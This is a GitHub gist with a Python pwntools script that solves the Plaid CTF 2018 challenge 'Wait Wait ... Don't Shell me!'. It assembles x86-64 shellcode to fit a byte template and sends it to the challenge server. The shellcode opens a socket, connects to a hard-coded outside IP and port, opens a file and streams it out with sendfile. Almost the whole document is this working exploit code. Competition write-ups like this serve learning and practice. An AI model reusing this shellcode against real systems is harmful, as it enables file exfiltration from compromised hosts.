Created
May 7, 2018 13:32
-
-
Save 0xBADCA7/f947e629b7246ec8942a56a98b80a927 to your computer and use it in GitHub Desktop.
Solution to Wait Wait ... Don't Shell me! Plaid CTF 2018 challenge. The shellcode sends a file to a remote socket.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.arch = 'amd64' | |
CODES = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba | |
__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __ | |
__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __ | |
__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __ | |
bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89 | |
__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __ | |
__ 0f 05 58'''.replace(' ','').replace('\n','').replace('__','cc').decode('hex') | |
#print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False) | |
def assemble(code): | |
codes = asm(code) | |
print disasm(codes) | |
print len(codes), len(CODES) | |
assert len(codes) == len(CODES) | |
byte = [] | |
for i in xrange(len(codes)): | |
if CODES[i] != '\xcc': | |
assert CODES[i] == codes[i] | |
else: | |
byte.append(ord(codes[i])) | |
return byte | |
#for x in xrange(0, 0x100000, 0x100): | |
x = 0 | |
if 1: | |
try: | |
r = remote('wwdsm.chal.pwning.xxx',6615, level='error') | |
print r.recv() | |
code = ''' | |
mov eax, SYS_socket | |
mov edi, -SYS_socket+2 | |
mov esi, 3 | |
mov edx, 0 | |
add edi,eax | |
sub esi,edi | |
and edx,esi | |
syscall | |
movabs rax,0x864add12d2040002 /*ip port AF_INET*/ | |
push rax | |
mov eax,SYS_connect | |
mov edx,0x10 | |
mov edi,0 | |
mov rsi,rsp | |
syscall | |
mov esi,0 | |
mov edi,0x400cb8+{} | |
mov edx,0 | |
add eax,SYS_open | |
syscall | |
mov esi, eax | |
mov eax, SYS_sendfile | |
mov edi,0 | |
mov r10d,0x999 | |
syscall | |
pop rax | |
'''.format(x) | |
p = assemble(code) | |
p = '\n'.join(map(lambda x: '%02x'%x,p)) | |
r.sendline(p) | |
print r.recv() | |
print r.recvuntil('won!\n') | |
print 0 | |
#r.sendline('asdf') | |
print r.recv() | |
print r.recv() | |
print r.recv() | |
print r.recv() | |
except KeyboardInterrupt: | |
pass | |
except Exception as e: | |
print e | |
finally: | |
print x | |
#출처: http://push0ebp.tistory.com/31 [Hacks] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment